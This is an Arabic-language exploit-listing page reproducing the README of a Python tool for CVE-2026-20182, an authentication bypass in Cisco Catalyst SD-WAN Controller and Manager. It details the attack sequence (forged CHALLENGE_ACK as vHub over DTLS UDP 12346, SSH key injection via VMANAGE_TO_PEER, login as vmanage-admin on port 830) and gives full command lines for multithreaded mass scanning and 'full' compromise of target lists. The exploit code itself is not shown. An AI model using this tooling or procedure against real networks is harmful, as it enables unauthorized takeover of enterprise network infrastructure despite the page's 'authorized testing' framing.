Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-20182 — تجاوز مصادقة Peering في Cisco Catalyst SD-WAN | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2026-20182
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالأمن الشبكاتاختبار الاختراقالفريق الأحمر
GitHubnxploited/cve-2026-20182

CVE-2026-20182

تجاوز مصادقة Peering في Cisco Catalyst SD-WAN

عرض المستودع
128منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-20182

تجاوز مصادقة الاقتران في Cisco Catalyst SD-WAN

CVE-2026-20182 — تجاوز مصادقة الاقتران في Cisco Catalyst SD-WAN

أداة تقييم للاختبار المصرح به لتجاوز مصادقة الاقتران في Cisco Catalyst SD-WAN Controller / Manager (CVE-2026-20182).

CVECVE-2026-20182
الخطورةحرجة (CVSS 10.0)
CVSS 3.1AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
المنتجCisco Catalyst SD-WAN Controller (المعروف سابقًا بـ vSmart) · Cisco Catalyst SD-WAN Manager (المعروف سابقًا بـ vManage)
المشكلةآلية مصادقة الاقتران لا يتم تطبيقها بشكل صحيح
السكربتCVE-2026-20182.py

ملخص الثغرة

نشرة مايو 2026: وجود خلل في مصافحة اتصال التحكم / مصادقة الاقتران يسمح لـمهاجم عن بُعد غير مصادَق بتجاوز المصادقة والحصول على وصول داخلي بصلاحيات عالية على الأنظمة المتأثرة.

يرسل المهاجم طلبات مخصصة إلى النظام المتأثر. عند النجاح، قد يتمكن المهاجم من المصادقة كحساب داخلي بصلاحيات عالية وغير جذر والوصول إلى NETCONF، مما يتيح التلاعب بإعدادات بنية SD-WAN.

العنصرالتفاصيل
متجه الهجومالشبكة
الصلاحيات المطلوبةلا شيء
تفاعل المستخدملا شيء
النطاقمتغير
الأثرالسرية والسلامة والتوافر — عالٍ

التوصية: طبّق إصلاحات Cisco الأمنية وفقًا لتوجيهات البائع الرسمية. قيّد التعرض لمستوى الإدارة، وراقب اتصالات مستوى التحكم، ودقّق في وحدات تحكم SD-WAN بحثًا عن تغييرات إعدادات غير مصرح بها.


التواصل

تيليجرام: @KNxploited


معاينة الكونسول

كونسول عمليات CVE-2026-20182


الأداة: CVE-2026-20182.py

إطار عمل استغلال بلغة Python 3 لـCVE-2026-20182 ضد vdaemon الخاص بـ Cisco SD-WAN (UDP/DTLS 12346).

ماذا تفعل الأداة (خطوة بخطوة)

الخطوةالمرحلةالوصف
1تحميل الأهدافتحليل targets.txt ودمج التكرارات حسب (host, domain_id, site_id)
2فحص OpenSSL المسبقتحميل المكتبات المشتركة OpenSSL 3.x/4.x لـ DTLS المخصص
3اتصال DTLSالاتصال بمنفذ UDP الهدف (دائمًا 12346 أولاً، ثم منافذ القائمة الاختيارية)
4CHALLENGEاستقبال CHALLENGE من الخادم (0x08)
5CHALLENGE_ACKإرسال CHALLENGE_ACK مخصص كـvHub (type 2) — تجاوز المصادقة
6Helloإكمال تبادل Hello — يؤكد مسار التجاوز
7aوضع CHECKالتوقف هنا — تسجيل bypass / Hello OK فقط (بدون مفاتيح، بدون SSH)
7bوضع FULLحقن مفتاح SSH العام عبر VMANAGE_TO_PEER
8ACK الحقنتوقع REGISTER_TO_VMANAGE (0x0D) كإقرار بروتوكول
9التحقق من SSHاختبار تسجيل الدخول باسم vmanage-admin عبر TCP 830 (NETCONF)، واختياريًا 22
10الإخراجفرز النتائج في ملفات متدرجة + قائمة أوامر قابلة للقراءة البشرية

الاحتياطي للبنية: عند حدوث TEAR_DOWN أو عدم تطابق المعاملات، يعيد المحاولة باستخدام الإعدادات المسبقة البديلة domain/site (1,100) و(1,1) و(0,0) ما لم يتم استخدام --no-fallback.


مستويات النتائج (اقرأ بعناية)

المستوىالملفالمعنى
01 — SSH مؤكدcisco_sdwan_01_confirmed_ssh.jsonlssh_verified=true — المستوى الوحيد الذي يُعتبر دليل اختراق كامل
02 — حقن ACK فقطcisco_sdwan_02_inject_ack_only.jsonlالبروتوكول قبل حقن المفتاح؛ فشل تسجيل دخول SSH
03 — تجاوز فقطcisco_sdwan_03_bypass_only.jsonlHello/تجاوز ناجح؛ لا يوجد حقن مؤكد

مهم

  • وضع check → المستوى 03 كحد أقصى (فحص تجاوز). ليس دليل استغلال كامل.
  • وضع full → استهدف المستوى 01 (ssh_verified).
  • https://host في القائمة → تلميح ويب TCP فقط (80/443). ليس UDP DTLS على 443.

المتطلبات

المتطلبملاحظات
Python3.9+
pipcryptography, rich
OpenSSLمكتبات مشتركة 3.x أو 4.x (libssl + libcrypto) — إلزامي
pip install -r requirements.txt

OpenSSL (النظام)

ويندوز

  1. ثبّت Win64 OpenSSL 3.x أو ما يعادله
  2. أضف bin\ إلى PATH، أو عيّن:
OPENSSL_HOME=C:\Program Files\OpenSSL-Win64

لينكس

# Debian/Ubuntu
sudo apt install libssl3 openssl
export LD_LIBRARY_PATH=/usr/lib/x86_64-linux-gnu:$LD_LIBRARY_PATH

تخرج الأداة عند بدء التشغيل إذا تعذر تحميل OpenSSL.


بدء سريع

القائمة التفاعلية (الافتراضي)

python CVE-2026-20182.py
  • اضبط الخيارات 1–11، ثم 0 = تشغيل الفحص
  • وضع التشغيل الافتراضي: check (فحص تجاوز آمن)

غير تفاعلي (أتمتة)

python CVE-2026-20182.py -y

أوضاع التشغيل

الوضعالعلامةحقن SSHالتحقق من SSHاستخدم عندما
CHECK--mode check (الافتراضي)لالافحص واسع النطاق، اكتشاف التجاوز
FULL--mode fullنعمنعم (ما لم يتم استخدام --no-ssh-verify)إثبات الاختراق

CHECK — فحص تجاوز فقط

python CVE-2026-20182.py -y --mode check

FULL — حقن مفتاح + التحقق من SSH (الأهداف المصرح بها فقط)

python CVE-2026-20182.py -y --mode full

مرجع سطر الأوامر (كل خيار + مثال)

الأهداف وخيوط العمل

-f / --file — قائمة الأهداف (الافتراضي: targets.txt)

python CVE-2026-20182.py -y -f my_controllers.txt --mode check

-t / --threads — عدد خيوط العمل (1–200، الافتراضي 12)

python CVE-2026-20182.py -y -f targets.txt -t 30 --mode check

--domain — DOMAIN_ID الافتراضي عندما لا يكون موجودًا في القائمة (الافتراضي: 1)

python CVE-2026-20182.py -y -f targets.txt --domain 1 --site 100 --mode check

--site — SITE_ID الافتراضي عندما لا يكون موجودًا في القائمة (الافتراضي: 100)

python CVE-2026-20182.py -y -f targets.txt --domain 1 --site 50 --mode full

الوضع والأتمتة

--mode — check | full

python CVE-2026-20182.py -y --mode full -f targets.txt

-y / --yes — تخطي القائمة التفاعلية؛ استخدام قيم سطر الأوامر فقط

python CVE-2026-20182.py -y -f targets.txt --mode check -t 20

التحقق من SSH

--no-ssh-verify — تخطي اختبار SSH بعد الحقن (غير موصى به في وضع full)

python CVE-2026-20182.py -y --mode full --no-ssh-verify -f targets.txt

--verify-ssh22 — محاولة استخدام TCP 22 أيضًا بعد 830

python CVE-2026-20182.py -y --mode full --verify-ssh22 -f targets.txt

UDP / البنية

--no-try-list-udp — UDP 12346 فقط؛ تجاهل :port من القائمة

python CVE-2026-20182.py -y --no-try-list-udp -f targets.txt --mode check

--extra-udp-ports — مختبر: منافذ UDP إضافية على كل مضيف

python CVE-2026-20182.py -y --extra-udp-ports 8080,8443 -f targets.txt --mode check

--no-fallback — تعطيل إعادة المحاولة domain/site عند TEAR_DOWN

python CVE-2026-20182.py -y --no-fallback -f targets.txt --mode full

التسجيل

-v / --verbose — تسجيل كل رسالة بروتوكول TX/RX

python CVE-2026-20182.py -y -v -f targets.txt --mode check

القائمة التفاعلية (عند حذف -y)

#الخيار
1ملف الأهداف
2خيوط العمل
3DOMAIN_ID الافتراضي
4SITE_ID الافتراضي
5الوضع: check / full
6إعادة المحاولة التلقائية للبنية عند TEAR_DOWN
7سجل البروتوكول المفصل
8التحقق من SSH بعد الحقن
9التحقق أيضًا من SSH :22
10محاولة استخدام منافذ UDP المحددة في القائمة
11منافذ UDP إضافية (مختبر)
12عرض مساعدة تنسيق القائمة
0▶ تشغيل الفحص

تنسيق targets.txt

هدف واحد لكل سطر. الأسطر التي تبدأ بـ # يتم تجاهلها.

تنزيل الأداة